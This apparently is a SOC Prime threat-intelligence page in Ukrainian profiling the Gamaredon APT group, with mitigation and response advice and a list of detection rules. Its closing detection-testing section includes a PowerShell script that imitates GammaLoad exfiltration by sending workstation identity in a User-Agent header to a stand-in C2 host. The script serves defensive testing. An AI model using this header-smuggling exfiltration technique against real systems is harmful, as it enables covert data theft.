SOC Prime Bias: Критичний

13 Jul 2026 15:41 UTC

Профіль APT Gamaredon (Primitive Bear) з мапінгом MITRE ATT&CK

Author Photo
SOC Prime Team linkedin icon Стежити
Профіль APT Gamaredon (Primitive Bear) з мапінгом MITRE ATT&CK
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Gamaredon – це група загроз розширеної стійкості, пов’язана з Росією, активна з 2013 року і приписується російській ФСБ. Група зосереджена на кібер-шпигунстві та крадіжці даних, з основними цілями, спрямованими на українські урядові та оборонні організації. Її операції спираються на спеціальні сімейства зловмисного ПЗ, такі як GammaLoad і GammaSteel, підтримані різними методами маскування та збереження доступу.

Розслідування

Звіт розглядає кампанії з 2013 по 2025 рік і підкреслює перехід групи до використання Cloudflare Workers, API Telegram і експлуатації вразливостей WinRAR. Він також відстежує розвиток Gamaredon від спеціальних дроперів VBScript до більш просунутих засобів крадіжки інформації на основі PowerShell і шпигунського ПЗ для мобільних пристроїв.

Пом’якшення

Рекомендовані заходи з пом’якшення включають виправлення WinRAR для вирішення CVE-2025-8088 і моніторинг підозрілих виконань PowerShell. Організації також повинні посилити контроль за знімними носіями, стежити за незвичайними запланованими завданнями та перевіряти захисні засоби проти відомих TTP Gamaredon через платформи симуляції та тестування.

Відповідь

Якщо активність Gamaredon виявлена, хто проводить розслідування, повинен негайно ізолювати уражені хости, особливо системи, які показують ознаки GammaSteel або Ptero* активності шкідливого ПЗ. Розслідувачі повинні перевірити стійкість на основі реєстру, оглянути заплановані завдання на наявність несанкціонованих записів і провести загальний пошук підозрілого вихідного трафіку до інфраструктури, пов’язаної з Cloudflare або Telegram.

Потік Атак

Виявлення

Виклик підозрілих методів .NET з Powershell (через powershell)

Команда SOC Prime
13 липня 2026

Можливі точки збереження [ASEP – Hive Software/NTUSER] (через об’єкт реєстру)

Команда SOC Prime
13 липня 2026

Можливе ексфільтрація даних через Rclone Tool (через командний рядок)

Команда SOC Prime
13 липня 2026

Завантаження або вивантаження через Powershell (через командний рядок)

Команда SOC Prime
13 липня 2026

Виклик підозрілих класів/методів .NET з командного рядка Powershell (через процес створення)

Команда SOC Prime
13 липня 2026

Schtasks вказує на підозрілий каталог/бінарний файл/скрипт (через командний рядок)

Команда SOC Prime
13 липня 2026

LOLBAS WScript / CScript (через процес створення)

Команда SOC Prime
13 липня 2026

Підозріла уникнення захисту LOLBAS MSHTA через виявлення пов’язаних команд (через процес створення)

Команда SOC Prime
13 липня 2026

Підозрілі бінарні файли/скрипти в розташуваннях автозапуску (через файл подію)

Команда SOC Prime
13 липня 2026

Можлива спроба експлуатації CVE-2025-8088 / CVE-2025-6218 (вразливість WinRAR) (через файл подію)

Команда SOC Prime
13 липня 2026

Можлива служба динамічного DNS контактувала (через dns)

Команда SOC Prime
13 липня 2026

Виявлення запитів Gamaredon GammaLoad з ексфільтрацією User-Agent [Windows Network Connection]

Правила AI SOC Prime
13 липня 2026

Завантажувач Powershell через ярлик LNK з обфускацією [Windows Powershell]

Правила AI SOC Prime
13 липня 2026

## Виконання симуляції

Передумова: необхідно, щоб перевірка телеметрії та базового стану перед запуском виконалась успішно.

Аргументація: цей розділ детально описує точне виконання техніки супротивника (TTP), призначеної для виклику правила виявлення. Команди та нарратив ПОВИННІ безпосередньо відображати ідентифіковані TTP та створювати точну телеметрію, очікувану за логікою виявлення. Абстрактні або не пов’язані приклади призведуть до помилкових діагнозів.

  • Опис атаки та команди: Супротивник встановив опорний пункт на WORKSTATION01. Щоб ексфільтрувати метадані системи (такі як імена хостів або користувачів) без активації традиційного фільтрації файлів, вони використовують спеціальне впровадження шкідливого ПЗ GammaLoad. Це шкідливе ПЗ виконує запити HTTP GET до віддаленого сервера управління та контролю (C2). Замість того, щоб розміщувати дані в URI або тілі POST, шкідливе ПЗ вбудовує закодовану ідентичність робочої станції в заголовок User-Agent : ::WORKSTATION01_encoded_data. Це дозволяє даним обійти просте фільтрування URL, залишаючись прихованими в стандартному веб-трафіку.

  • Скрипт регресійного тесту: Цей скрипт використовує PowerShell для симуляції конкретного запиту HTTP GET з шкідливим рядком User-Agent, необхідним для виклику правила.

    # Симуляція ексфільтрації User-Agent у GammaLoad
    $TargetUrl = "http://example-c2-server.com/api/check"
    $MaliciousUA = "::WORKSTATION01_V3_DATA_EXFIL_TEST"
    
    Write-Host "[*] Початок симуляції: відправлення запиту GET з шкідливим User-Agent..." -ForegroundColor Cyan
    
    try {
        $response = Invoke-WebRequest -Uri $TargetUrl -UserAgent $MaliciousUA -Method GET
        Write-Host "[+] Запит успішно відправлено. Перевірте SIEM для попередження." -ForegroundColor Green
    }
    catch {
        # Ми очікуємо на помилку підключення, якщо URL не існує,
        # але User-Agent все ще буде записаний проксі.
        Write-Host "[!] Спроба запиту (Примітка: помилка підключення очікується, якщо URL є недійсним, але проксі-логи повинні все ще записувати UA)." -ForegroundColor Yellow
    }
  • Команди очищення: Оскільки ця симуляція лише генерує тимчасовий мережевий трафік і не змінює системні файли або ключі реєстру, очищення не потрібно.

    # Жодних змін у системі не було. Симуляція завершена.
    Write-Host "[*] Очищення: слідів на хості немає." -ForegroundColor Green